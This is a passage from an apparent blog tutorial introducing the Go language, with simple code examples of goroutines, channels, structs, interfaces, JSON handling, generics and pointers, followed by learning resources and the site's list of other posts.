As you may notice, I just had to add the keyword go before calling the function to turn the function into a Goroutine. And of course I can call the echo() function without having to mark it as a Goroutine. After running the code, here is a sample output I got:

Hello
world
world
Hello
world
Hello
Hello
world
world
Hello

You can clearly see, that the echo("Hello") method runs without having to wait for the Goroutine to end, this is concurrency.

Channels

What makes Go's concurrency different and unique from different languages are so called channels. You can see channels as being pipes that transfer data. This is used to send values and data from one goroutine to another one, or just to get data back from a goroutine.
Take this example:

package main

import "fmt"

func sum(list []int, channel chan int) {
    sum := 0
    for _, value := range list {
        sum += value
    }
    channel <- sum // Here we send the sum to the channel
}

func main() {
    list1 := []int{1, 2, 3}
    list2 := []int{9, 8, 7}

    channel := make(chan int) // Here we create a channel that accepts integers
    go sum(list1, channel)
    go sum(list2, channel)
    x := <-channel // Here we receive data from the channel
    y := <-channel

    fmt.Println(x, y, x+y) // Output: 24 6 30
}

This small example simply sums the numbers from a slice and puts the work between two goroutines so that they are being calculated concurrently and is therefore faster. Once both goroutines gave their output, it will calculate the final result and print it in the console. The arrows such as <- simply describe from where to where the data goes, so either from the channel to the variable or from the variable in the channel.

🌳 Does Go have objects?

Of course! There's just one slight difference here. Go doesn't directly have a type object, but they have a type that matches the definition of a data structure that integrates both code and behavior. It's called a struct. Let me show you a very simple example.

Structs

package main

import "fmt"

type Rectangle struct {
    Width  int
    Height int
}

// The '(rect *Rectangle)' before the method name shows to which object the method will operate, in this case the 'rectangle' object.
func (rect *Rectangle) Area() int {
    return rect.Width * rect.Height
}

func main() {
    rect := Rectangle{Width: 10, Height: 5}
    // As expected, the output is 50.
    fmt.Println("Area: ", rect.Area())
}

Implicit inheritance

package main

import "fmt"

type Shape interface {
    Area() float64
}

type Rectangle struct {
    Width  float64
    Height float64
}

func (rect Rectangle) Area() float64 {
    return rect.Width * rect.Height
}

func main() {
    var s Shape = Rectangle{Width: 10, Height: 50}
    fmt.Println(s.Area())
}

As you can see from the example above, the struct Rectangle implements the interface Shape but nowhere in the code it's clearly written, that it implements it.

🔪 Hello Jason!

Jason? Yes, JSON. JSON is widely used in web development and is a very easy way to send data between a client and a server. Go has a built-in library to handle JSON, so let's see how to use it.

Unmarshalling

Unmarshalling is the process of converting a JSON string into a Go object. So let's suppose we have an API that returns content like the following:

{
    "name": "Gopher",
    "age": 5,
    "hobbies": [
        "coding",
        "eating",
        "sleeping"
    ]
}

We can easily parse this JSON into a Go struct like the following:

package main

import (
    "encoding/json"
    "fmt"
)

// Gopher represents a gopher structure that will be parsed from JSON.
type Gopher struct {
    Name    string   `json:"name"` // The 'json:"name"' is used to tell the JSON parser to use the 'name' field from the JSON.
    Age     int      `json:"age"`
    Hobbies []string `json:"hobbies"`
}

func main() {
    jsonStr := `
    {
        "name": "Goophy",
        "age": 5,
        "hobbies": [
            "coding",
            "eating",
            "sleeping"
        ]
    }
    `
    // This variable will hold the parsed JSON data.
    var gopher Gopher
    // Here we parse the JSON string into the 'gopher' variable.
    json.Unmarshal([]byte(jsonStr), &gopher)

    fmt.Println(gopher) // {Goophy 5 [coding eating sleeping]}
    fmt.Println("Name:", gopher.Name) // Name: Goophy
    fmt.Println("Age:", gopher.Age) // Age: 5
    for _, h := range gopher.Hobbies {
        fmt.Println("Hobby:", h) // Hobby: coding/eating/sleeping
    }
}

We can pretty much handle any JSON data with this method, as long as the JSON data matches the struct.

Marshalling

But what if your application doesn't need to interact with an external API because it is an API, you most likely want to convert your Go struct into JSON. This is called marshalling, and this is where the json.Marshal() method comes in handy. Let's see how to use it:

package main

import (
    "encoding/json"
    "fmt"
)

type Gopher struct {
    Name              string   `json:"name"` // The 'json:"name"' is used to tell the JSON marshaller to specifically use for the field name 'name' and not something random.
    Age               int      `json:"age"`
    Hobbies           []string `json:"hobbies"`
    SecretInformation string   `json:"-"` // The '-' tells the JSON marshaller to ignore this field, we can still use it within our code. Alternatively, we can simply lowercase the field name, which will also tell the JSON marshaller to ignore it, though the field will not be exported.
}

func main() {
    // Here we create our struct.
    gopher := Gopher{
        Name:              "Goophy",
        Age:               5,
        Hobbies:           []string{"coding", "eating", "sleeping"},
        SecretInformation: "I am a secret agent for the Gopher Nation.",
    }
    // Here we convert the 'gopher' struct into JSON.
    json, _ := json.Marshal(gopher)
    fmt.Println(string(json)) // {"name":"Goophy","age":5,"hobbies":["coding","eating","sleeping"]}
}

Now that we have the JSON, we can repond to the API request with it.

🧬 Generics

As of Go 1.18 we now have generics support available, which is a great addition to the language. It's not as powerful as other languages, but it's a great start.

Here is some code that works perfectly fine without generics.

package main

import "fmt"

func getSumIntList(list []int) int {
    sum := 0
    for _, value := range list {
        sum += value
    }
    return sum
}

func getSumFloatList(list []float64) float64 {
    sum := 0.0
    for _, value := range list {
        sum += value
    }
    return sum
}

func main() {
    myListOfInts := []int{1, 2, 3, 4, 5}
    intSum := getSumIntList(myListOfInts)
    fmt.Println(intSum) // 15

    myListOfFloats := []float64{1.1, 2.2, 3.3, 4.4, 5.5}
    floatSum := getSumFloatList(myListOfFloats)
    fmt.Println(floatSum) // 16.5
}

Now this is all not so wonderful because we pretty much copy paste the exact same logic, just for two different data types. This is where generics come in handy. Let's rewrite the code to use generics.

package main

import "fmt"

func getSumList[T int | float64](list []T) T {
    var sum T
    for _, value := range list {
        sum += value
    }
    return sum
}

func main() {
    myListOfInts := []int{1, 2, 3, 4, 5}
    intSum := getSumList(myListOfInts)
    fmt.Println(intSum) // 15

    myListOfFloats := []float64{1.1, 2.2, 3.3, 4.4, 5.5}
    floatSum := getSumList(myListOfFloats)
    fmt.Println(floatSum) // 16.5
}

We got the exact same output!
To explain that very easily, we first kind of define a new type T which can be either an int or a float64 - this is what [T int | float64] does. We can of course go on and say we want to allow the type any but that isn't ideal when using += like in the example and won't work as well.
The second part is where we say what type we want to have in our parameter - (list []T) - this will make sure we provide a list that contains elements of the type T which is, either int or float64.
Finally, we have the return value of the function to be of type T as well.

That way we can reuse our function for different data types and don't have to write the same logic over and over again.

👆 Pointers

Similarly to C, Go has pointers as well. They are used to point to a memory address of a variable. This is useful when you want to change the value of a variable inside a function, but you don't want to return the value. You can simply pass the pointer to the variable and change the value inside the function. Let's take a look at an example without using pointers:

package main

import "fmt"

func changeValue(value int) {
    value = 10
}

func main() {
    x := 5
    changeValue(x)
    fmt.Println(x) // 5
}

As you can see, it will still print 5 and not 10, some people might expect it to print 10 though. The reason for that is because we didn't change the value of x but instead we changed the value of the variable value inside the function. To change the value of x we need to use pointers.

package main

import "fmt"

func changeValue(value *int) {
    *value = 10
}

func main() {
    x := 5
    changeValue(&x)
    fmt.Println(&x) // 0x14000014090
    fmt.Println(x) // 10
}

To understand it a bit better, I've added a print of &x. This will print the memory address of x which is 0x14000014090. The * in front of value is called a dereference operator and it will get the value of the variable that the pointer points to. So in this case, it will get the value of x and change it to 10. The & in front of x is called a reference operator and it will get the memory address of the variable x. This is what we pass to the function so that we can change the value of x inside the function, as it points to the memory.

We can also use pointers with custom structures as well.

package main

import "fmt"

type Person struct {
    Name string
    Age  int
}

func changePersonAge(person *Person) {
    person.Age = 10
}

func main() {
    person := Person{
        Name: "John",
        Age: 20,
    }
    changePersonAge(&person)
    fmt.Println(person.Age) // 10
}

The entire pointer story might be a bit confusing at first, hence I recommend to play around and see how it works.

😎 Popular open-source projects

As you might have expected, there are some really popular projects that are using Go. Here is just a small list among a lot of other projects:

🏫 How do I get started?

I'm glad you're interested in learning more about Go by yourself!

Installation

The installation is really easy regardless of the operating system you have, simply go to the download page and follow the instructions. Oh and remember, Go works on every operating system!

Learning resources

I don't really have specific learning resources but these are the things I've used to start to learn and code in Go:

A tour of Go
Codecademy
Effective Go
Go's Documentation
Go by Example
Sololearn (My favorite as you get a better overview of concurrency)

I'd be happy to see you become part of the Gophers!

DEV Community: Krypton

💀 Insomni'hack 2025 CTF write-up

Welcome To Insomni'hack

v0l4til3

Crack the gate

EG101

Hawkta

🚩 Bitwise flags are amazing, and you should use them

Operators Refresh

OR Operator

AND Operator

Left Shift Operator

How do bitwise flags work?

Check if flag exists

Creating the a.Flags value

Why and where to use bitwise flags?

Roles

Without bitwise flags

With bitwise flags

Permissions

Remove unnecessary functions

Without bitwise flags

With bitwise flags

Conclusion

⛄️ Generating unique IDs with the Snowflake algorithm

How to get unique IDs?

Auto incrementing integer

UUID

What is a Spaceflake?

Workers & Nodes = Spaceflake Network

Why did I create Spaceflakes?

Some issues I've faced during development

Go is fast

Incremental is not enough for bulk generation

Spaceflakes are big numbers

How to use Spaceflakes?

🚀 Space Heroes 2022 CTF write-up

🆗 k?

💬 Discord

🛡️ Guardians of the Galaxy

🧑‍🚀 Space traveler

🕵️‍♂️ Curious?

🚀 Launched

🌌 Flag in space

🤖 R2D2

🌟 Starman

🐕 Space Buds

🛰️ Cape Kennedy

⭐ Star Pcap

👁️‍🗨️ Mysterious Broadcast

🐈 Space Captain Garfield

🚩 Netflix and CTF

🚦 Strange Traffic

🔮 Future Stego

🚩 Insomni'hack 2022 CTF write-up

🐛 GDBug

🤖 Bot Telegram

🅰️ Wordle

🌊 Weak Rivest 4

🔮 Magic Words

👋 Welcome challenge

📗 What is Go?

📜 About Go

🤔 Why has Go been created?

🎖️ Why is Go "so good"?

🤯 How hard is Go?

👋 A "Hello world!" in Go

📚 What are packages?

Installing packages

🌐 Did I hear web server?

🥈 What is Go's concurrency?

Goroutines

Channels

🌳 Does Go have objects?

Structs

Implicit inheritance

🔪 Hello Jason!

Unmarshalling

Marshalling

🧬 Generics

`OR` Operator

`AND` Operator

Creating the `a.Flags` value